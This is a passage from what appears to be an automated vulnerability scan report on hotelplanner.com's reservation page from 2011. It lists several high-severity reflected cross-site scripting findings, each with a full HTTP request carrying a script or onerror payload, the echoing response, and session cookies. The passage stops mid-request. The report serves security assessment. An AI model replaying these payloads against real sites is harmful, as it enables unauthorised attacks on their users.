This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=31a57--><img%20src%3da%20onerror%3dalert(1)>ded68a36227&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCod
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:34:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 31a57--><img src=a onerror=alert(1)>ded68a36227 cannot be converted to a number. <br>
...[SNIP]...

4.296. https://www.hotelplanner.com/Accept/Reserve.cfm [guaranteeRequired parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the guaranteeRequired request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cdc4"><script>alert(1)</script>9e0c0b1755e was submitted in the guaranteeRequired parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false4cdc4"><script>alert(1)</script>9e0c0b1755e&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuot
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:41 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="guaranteeRequired" value="false4cdc4"><script>alert(1)</script>9e0c0b1755e">
...[SNIP]...

4.297. https://www.hotelplanner.com/Accept/Reserve.cfm [hotelID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the hotelID request parameter is copied into an HTML comment. The payload d8c46--><img%20src%3da%20onerror%3dalert(1)>07b9aa2c06b was submitted in the hotelID parameter. This input was echoed as d8c46--><img src=a onerror=alert(1)>07b9aa2c06b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
M+%28%28GMT-05%3A00%29+Eastern+Time+%28US+%26+Canada%29%29+on+Oct+3%2C+2011+are+subject+to+a+1+Night+Room+%26+Tax+penalty.+The+property+makes+no+refunds+for+no+shows+or+early+checkouts.&hotelID=113791d8c46--><img%20src%3da%20onerror%3dalert(1)>07b9aa2c06b&HotelName=MILLENNIUM+BOSTONIAN+HOTEL+BOSTON&bookIt.x=100&bookIt.y=33

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:36:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 113791d8c46--><img src=a onerror=alert(1)>07b9aa2c06b cannot be converted to a number. <br>
...[SNIP]...

4.298. https://www.hotelplanner.com/Accept/Reserve.cfm [hrnQuoteKey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the hrnQuoteKey request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43004"><script>alert(1)</script>c625091ee21 was submitted in the hrnQuoteKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ype=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f68495343004"><script>alert(1)</script>c625091ee21&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.+However%2C+this+property+%28Millennium+Bostonian
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:20 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="hrnQuoteKey" value="9f715d9d-c49b-4dea-841d-bf8e7f68495343004"><script>alert(1)</script>c625091ee21">
...[SNIP]...

4.299. https://www.hotelplanner.com/Accept/Reserve.cfm [immediateChargeRequired parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the immediateChargeRequired request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1156"><script>alert(1)</script>2e6da93adbe was submitted in the immediateChargeRequired parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
mRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=trued1156"><script>alert(1)</script>2e6da93adbe&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescriptio
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:29 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="immediateChargeRequired" value="trued1156"><script>alert(1)</script>2e6da93adbe">
...[SNIP]...

4.300. https://www.hotelplanner.com/Accept/Reserve.cfm [locale parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ad1"><script>alert(1)</script>bcab21e07d7 was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_USc9ad1"><script>alert(1)</script>bcab21e07d7&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="locale" value="en_USc9ad1"><script>alert(1)</script>bcab21e07d7">
...[SNIP]...

4.301. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeCurrencyCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the nativeCurrencyCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2279f"><script>alert(1)</script>9b3ceb2908a was submitted in the nativeCurrencyCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD2279f"><script>alert(1)</script>9b3ceb2908a&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&d
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:12 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="nativeCurrencyCode" value="USD2279f"><script>alert(1)</script>9b3ceb2908a">
...[SNIP]...

4.302. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeRoomRate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the nativeRoomRate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4056c"><script>alert(1)</script>09a0685d1d3 was submitted in the nativeRoomRate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.24056c"><script>alert(1)</script>09a0685d1d3&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:08 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="nativeRoomRate" value="1434.24056c"><script>alert(1)</script>09a0685d1d3">
...[SNIP]...

4.303. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the numberOfAdults request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77570"><script>alert(1)</script>39a512bdb59 was submitted in the numberOfAdults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
